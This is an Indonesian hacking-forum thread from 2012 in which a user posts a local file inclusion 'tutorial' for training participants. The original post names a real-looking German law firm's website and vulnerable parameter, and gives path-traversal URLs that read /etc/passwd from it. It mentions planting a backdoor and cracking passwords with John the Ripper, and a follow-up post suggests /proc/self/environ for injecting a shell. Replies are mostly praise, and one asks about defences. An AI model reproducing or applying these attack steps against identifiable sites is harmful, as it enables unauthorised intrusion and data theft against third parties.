> > > > >


[Share] LFI TutoriaL [special 4 peserta training 20 maret 2012]
koecroet Offline
<<-- yang punya naga
44 - 808
#1
03-21-2012, 01:14 AM
setelah lama gk bikin tread ane malam ini mau bikin tread atas nama penasaran dan kesalahan ane karna ada yg menanyakan apakah website ini vulnerable atau tidak. dan ternyata ada dan ane sudah sampai di /etc/passwd walau belum sempat untuk menanam backdoor dikarenakan di butuhkan perabaan file lagi dan besok hari ane UAS fisika dan Ipa wkwkwkwk

oke deh ane lupa tadi yg nannya om siapa yg jelas ini special untuk ente Smile

Code:
bug nya terletak disini:
http://www.rechtsanwalt-bohle.de/index.php?tarcont=

Code:
kalo dikasih
http://www.rechtsanwalt-bohle.de/index.php?tarcont=./../../../../../etc/passwd

muncul error kan?? Tongue, tapi belom muncul isi file dari /etc/passwd. eits sebelum itu jangan2 ada yg belom tau lagi macem isi dari /etc/passwd gimana Tongue. coba buka dulu di backtrack ente,
Code:
cat /etc/passwd

itu akan muncul isi dari file /etc/passwd yang nantinya bisa di crack dengan JTR bin John The Ripper

okeh lanjut error tersebut bisa dikatakan bug terdapat, tapi belom ketemu /etc/passwd nya, hmm sekarang coba kita mundur dengan
Code:
../../../

coba kita langsung ke /etc/passwd
Code:
www.rechtsanwalt-bohle.de/index.php?tarcont=/etc/passwd

tada!!
muncul deh isi /etc/passwd walaupun harus di exploit lanjut buat tanam shell nya.

disini ane hanya menunjukan ke peserta training tadi kalo web ini ada bug lfi nya Smile

thank u

Quote:curcol dikit, ane lagi keingetan mantan :|

mohon maaf kalo tutorial nya cupu abis, apa lagi buat yg udah dewi bin dewo banget *sungkem* *tendang* *kaburr*

ane masih jauh dari kata pentester apa lagi hacker,

salam..
[shcode=This_site_xss-ed]
(This post was last modified: 04-17-2015, 11:55 PM by iKONspirasi.)  
Website Find
Reply

zee eichel Offline
IBTeam Server Sysadmn
269 - 2,291
#2
03-21-2012, 01:34 AM
yup sayangnya sudah jarang bug2 seperti itu .. sudah old bug .. tapi gk apa2 ini bahan pembelajaran
nice share
FOLLOW @DutaLinux
for more question and sharing about security and Opensource only
www.dutalinux.org
 
Website Find
Reply

koecroet Offline
<<-- yang punya naga
44 - 808
#3
03-21-2012, 01:41 AM
iya om udah jrang banget bug kaya gini, td ada yg nannya aja Tongue
[shcode=This_site_xss-ed]
 
Website Find
Reply

iKONspirasi Offline
Sysadmin
56 - 2,544
#4
03-21-2012, 01:56 AM
nice buat belajar nih, +1 dari ane biar semangat Big Grin
I'm @ikonspirasi - Facebook
Personal blog: http://ikonspirasi.net
 
Website Find
Reply

sasaka Offline
Banned moderator
5 - 49
#5
03-21-2012, 08:56 AM
ini mana poc nya??
etc passwd kan cuma dapet user doang,,, ckckkck Tongue
 
Find
Reply

koecroet Offline
<<-- yang punya naga
44 - 808
#6
03-21-2012, 02:39 PM
tujuan ane cuma smpe nampilin /etc/passwd doank Tongue. tp kan bisa di cari lagi "/proc/self/environ" kalo bisa di akses kan tinggal di selipin shell
salah naro di VIP tadi hhe
[shcode=This_site_xss-ed]
(This post was last modified: 03-21-2012, 02:46 PM by koecroet.)  
Website Find
Reply

ekawithoutyou Away
just suramer
25 - 836
#7
03-21-2012, 03:23 PM
wah boleh juga... ni ahahahahah Tongue makanya tadi waktu cari ga ada taunya di masukan VIP forum
Every Second, Every Minutes, Every Hours, Every Days Its Never End
 
Find
Reply

Divha Offline

0 - 13
#8
03-21-2012, 08:02 PM
wiih , mantap bang buat pembelajaran Smile
Code:
Follow @MafiaChoco
 
Find
Reply

permana Offline
Share
13 - 253
#9
03-26-2012, 09:19 PM
mantap pak dhe . . tapi ndak tahu tanam shellnya Sad
 
Find
Reply

xCode$ Offline
Donatur
4 - 74
#10
09-29-2012, 09:37 AM
om,ini kalo dari segi web programmingnya atau dari segi setting servernya gimana biar g bisa kena lfi?

buat antisipasi gitu
 
Find
Reply






Users browsing this thread: 1 Guest(s)